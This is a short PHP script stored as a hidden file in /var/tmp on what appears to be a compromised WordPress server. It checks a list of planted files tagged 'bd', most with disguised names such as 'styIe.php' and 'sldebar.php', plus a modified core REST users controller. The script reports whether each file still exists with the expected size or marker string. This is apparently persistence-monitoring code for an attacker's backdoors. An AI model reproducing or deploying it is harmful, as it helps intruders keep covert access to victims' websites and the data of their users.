File: //var/tmp/.accept
<?php $r = '/home/sermaray/sermaray.com'; $x = ["/wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php"=>"bd@@313245@@If-Unmodified-Since",
"/wp-content/plugins/seo-1751116060/qbasic.php"=>"bd@@1136450@@1057",
"/wp-content/themes/author_template_1748015248/sldebar.php"=>"bd@@250948@@727",
"/wp-content/themes/home-1748025567/styIe.php"=>"bd@@260294@@727",
"/wp-content/plugins/seo-1751116060/wp-config.php"=>"bd@@426701@@727",
"/751a50.php"=>"bd@@18128@@105",
"/wp-content/themes/twentytwelve/tag.php"=>"bd@@378079@@Clear-Site-Data"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');